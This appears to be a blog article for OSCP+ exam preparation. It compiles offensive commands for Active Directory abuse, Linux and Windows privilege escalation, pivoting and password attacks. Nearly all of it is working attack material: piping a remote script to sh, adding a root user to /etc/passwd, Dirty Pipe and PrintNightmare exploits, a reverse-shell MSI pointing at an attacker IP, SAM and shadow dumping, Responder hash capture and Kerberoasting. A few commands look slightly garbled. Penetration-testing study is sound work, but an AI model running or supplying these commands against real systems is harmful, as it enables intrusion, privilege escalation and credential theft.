OSCP+ Domination: 12 Must-Know Attack Vectors & Privilege Escalation Techniques (With Commands) + Video

Listen to this Post

Featured Image

Introduction:

The OSCP+ certification demands hands‑on mastery of real‑world penetration testing, from initial enumeration to domain compromise. This article extracts technical content from a high‑intensity CTF training program, delivering actionable commands, tool configurations, and exploitation workflows that mirror exam scenarios. Whether you’re pivoting through networks or abusing Active Directory, these step‑by‑step guides will sharpen your offensive security skills.

Learning Objectives:

  • Execute multi‑stage Linux and Windows privilege escalation using kernel exploits, misconfigurations, and service abuses.
  • Perform Active Directory enumeration and lateral movement with BloodHound, PowerView, and Impacket.
  • Build and deploy tunneling & pivoting techniques (SSH, Chisel, Meterpreter) to breach segmented networks.

You Should Know:

1. Active Directory Enumeration – BloodHound & SharpHound

This section extracts core enumeration from the training’s “Active Directory Attacks” module. BloodHound maps AD attack paths via graph theory. You will collect data, analyze shortest paths to Domain Admins, and execute targeted abuse.

Step‑by‑step guide (Linux attacker, Windows target):

  • Install BloodHound and Neo4j (Debian/Ubuntu):
    sudo apt install neo4j bloodhound
    sudo systemctl start neo4j
    Access http://localhost:7474, default creds neo4j:neo4j, change password
    
  • Run SharpHound on Windows target (via Cobalt Strike beacon or RDP):
    .\SharpHound.exe -c All --domaindomain.local --ZipFileName loot.zip
    
  • Alternatively, use BloodHound.py from Linux (no Windows agent):
    bloodhound-python -d domain.local -u lowpriv -p 'password' -ns 192.168.1.10 -c all
    
  • Import the resulting `.zip` or `.json` files into BloodHound GUI.
  • Query for high‑value edges: “Find Shortest Paths to Domain Admins” or “List all Kerberoastable users”.
  • Abuse example – If a user has `GenericAll` over a domain admin, use `net rpc` or Set-ADACL:
    On Windows with PowerView
    Add-DomainObjectAcl -TargetIdentity "DomainAdminUser" -PrincipalIdentity "our_user" -Rights All
    Then change password using
    $NewPassword = ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force
    Set-DomainUserPassword -Identity "DomainAdminUser" -AccountPassword $NewPassword
    

What this does: Maps user‑to‑computer relationships, domain trusts, and high‑privilege sessions, enabling lateral movement and privilege escalation with minimal noise.

2. Linux Privilege Escalation – Automated & Manual

From the training’s “Linux Privilege Escalation” topic. Attackers start with low‑privilege shell; escalate via SUID binaries, cron jobs, and kernel exploits.

Step‑by‑step:

  • Run LinPEAS (Linux Privilege Escalation Awesome Script):
    curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
    
  • Manually check SUID binaries:
    find / -perm -4000 2>/dev/null
    If /usr/bin/cp has SUID, overwrite /etc/passwd
    cp /etc/passwd /tmp/passwd; echo "root2:$(openssl passwd -1 -salt salt password123):0:0:root:/root:/bin/bash" >> /tmp/passwd; cp /tmp/passwd /etc/passwd
    sw_vers  For macOS but similar check on Linux
    
  • Exploit misconfigured sudo:
    sudo -l  Look for (root) NOPASSWD: /usr/bin/vim
    sudo vim -c ':!/bin/sh'  Spawn root shell
    
  • Kernel exploit (e.g., Dirty Pipe – CVE‑2022‑0847):
    wget https://raw.githubusercontent.com/Alu-Cannon/CVE-2022-0847/main/exploit.c
    gcc exploit.c -o dirtypipe
    ./dirtypipe /etc/passwd 1 "root2:passwordhash:0:0:root:/root:/bin/bash\n"
    

Why it matters: Over 60% of exam machines require privilege escalation. Automating enumeration and knowing manual fallbacks is critical for OSCP+ success.

  1. Windows Privilege Escalation – Potato Style & Print Spooler

Extracted from “Windows Privilege Escalation” section. Attackers abuse SeImpersonate privileges, unquoted service paths, and print spooler vulnerabilities.

Step‑by‑step:

  • Enumerate with WinPEAS:
    .\winPEASx64.exe quiet cmd > output.txt
    
  • SeImpersonatePrivilege → JuicyPotatoNG (Windows 10/Server 2019):
    JuicyPotatoNG.exe -t  -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\temp\imp.txt" -l 1337
    
  • PrintNightmare (CVE‑2021‑1675) – Add a local admin:
    Using SharpPrintNightmare
    .\SharpPrintNightmare.exe C:\path\to\malicious.dll
    
  • Unquoted service path:
    wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\"
    If path = C:\Program Files\Vuln Service\service.exe is vulnerable, place payload in C:\Program.exe
    
  • AlwaysInstallElevated MSI:
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    If set to 1, generate malicious MSI:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f msi -o rev.msi
    msiexec /quiet /qn /i rev.msi
    

Tip: Run `whoami /priv` immediately. SeImpersonate, SeAssignPrimaryToken, or SeBackupPrivilege are gold.

  1. Tunneling & Pivoting – Chisel and SSH Dynamic Forwarding

Based on the “Tunneling & Pivoting Techniques” module. Once you compromise a jump host, pivot into internal networks.

Step‑by‑step:

  • SSH local port forwarding (from attacker to internal host):
    ssh -L 8080:internal-web:80 user@jumphost
    
  • SSH dynamic SOCKS5 proxy:
    ssh -D 9050 user@jumphost
    Then configure proxychains: socks5 127.0.0.1 9050
    proxychains nmap -sT -Pn 10.0.20.0/24
    
  • Chisel – fast HTTP tunneling (install from GitHub):
    On attacker (server mode)
    chisel server -p 8000 --reverse
    On compromised jump host (client)
    chisel client attacker_ip:8000 R:socks
    
  • Meterpreter pivoting (after getting a shell):
    run autoroute -s 10.0.0.0/255.255.0.0
    background
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 10.0.20.5
    run
    

Real‑world utility: Pivoting is non‑negotiable for internal network breaches. OSCP+ often places a public facing server as a gateway.

5. Password Attacks – Hash Extraction & Cracking

From the “Password Attacks & Credential Exploitation” section. Extract hashes from Windows (SAM, LSASS, NTDS) and Linux (/etc/shadow), then crack offline.

Step‑by‑step:

  • Windows – dump SAM using reg.exe:
    reg save hklm\sam sam.save
    reg save hklm\system system.save
    Transfer to attacker, then impacket-secretsdump
    impacket-secretsdump -sam sam.save -system system.save LOCAL
    
  • Linux – unshadow & crack:
    cat /etc/passwd > passwd.txt
    cat /etc/shadow > shadow.txt
    unshadow passwd.txt shadow.txt > combined.txt
    hashcat -m 1800 -a 0 combined.txt /usr/share/wordlists/rockyou.txt
    
  • Capture NetNTLMv2 via responder (on attacker LAN):
    sudo responder -I eth0 -wrf
    Victim browses to a fake SMB share, hash captured
    hashcat -m 5600 captured_hash.txt rockyou.txt
    
  • Kerberoasting with impacket:
    impacket-GetUserSPNs -request -dc-ip 192.168.1.10 domain.local/lowpriv:password -outputfile kerb.txt
    hashcat -m 13100 kerb.txt rockyou.txt
    

Pro tip: Use `–force` for hashcat on slow systems. Combine wordlists with rules for high entropy passwords.

What Undercode Say:

  • Automation is the floor, not the ceiling. Tools like LinPEAS and BloodHound give you a head start, but manual verification (checking sudo -l, cron scripts, path injection) separates pass from fail.
  • Pivoting labs are under‑practiced. Many CTF players skip tunneling, yet exam networks always include multiple subnets. Master Chisel and SSH dynamic forwarding before test day.
  • Active Directory abuse is 40% of the exam. If you cannot enumerate Kerberoastable accounts or abuse ACLs, you will not pass OSCP+.

Prediction:

By Q4 2026, certification exams like OSCP+ will inject more cloud‑native attack paths (misconfigured Azure AD, AWS IAM privilege escalation). Training programs will shift from pure on‑prem AD to hybrid pivoting, and automated detection engines (EDRs) will force attackers to learn advanced evasion. The practice CTF format described here will evolve into “Purple Team” labs where candidates both attack and write defensive reports. Sign up now to stay ahead of the curve.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Oscp Exam – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky